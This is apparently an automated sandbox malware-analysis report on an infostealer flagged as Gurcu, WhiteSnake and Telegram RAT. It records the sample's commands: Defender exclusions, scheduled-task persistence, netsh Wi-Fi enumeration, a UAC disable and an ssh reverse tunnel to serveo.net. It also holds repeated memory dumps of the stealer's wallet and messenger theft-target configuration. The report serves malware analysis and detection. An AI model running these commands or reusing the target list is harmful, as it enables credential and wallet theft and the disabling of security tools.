Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "add-mppreference -exclusionpath 'c:\users\user\desktop\jqohoupmjp.exe'; add-mppreference -exclusionprocess 'jqohoupmjp'; add-mppreference -exclusionpath 'c:\windows'; add-mppreference -exclusionpath 'c:\users\user'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "vkefq4cv.oil" /sc minute /tr "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\vkefq4cv.oil.exe" &&start "" "c:\users\user\appdata\local\robloxsecurity\vkefq4cv.oil.exe	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Queries volume information: C:\Users\user\Desktop\jqOHOuPMJP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Queries volume information: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe VolumeInformation

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.41.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.41.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.41.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.41.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Gurcu Stealer

Source: Yara match	File source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match

File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>.db;.tox;.ini;.json;.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command 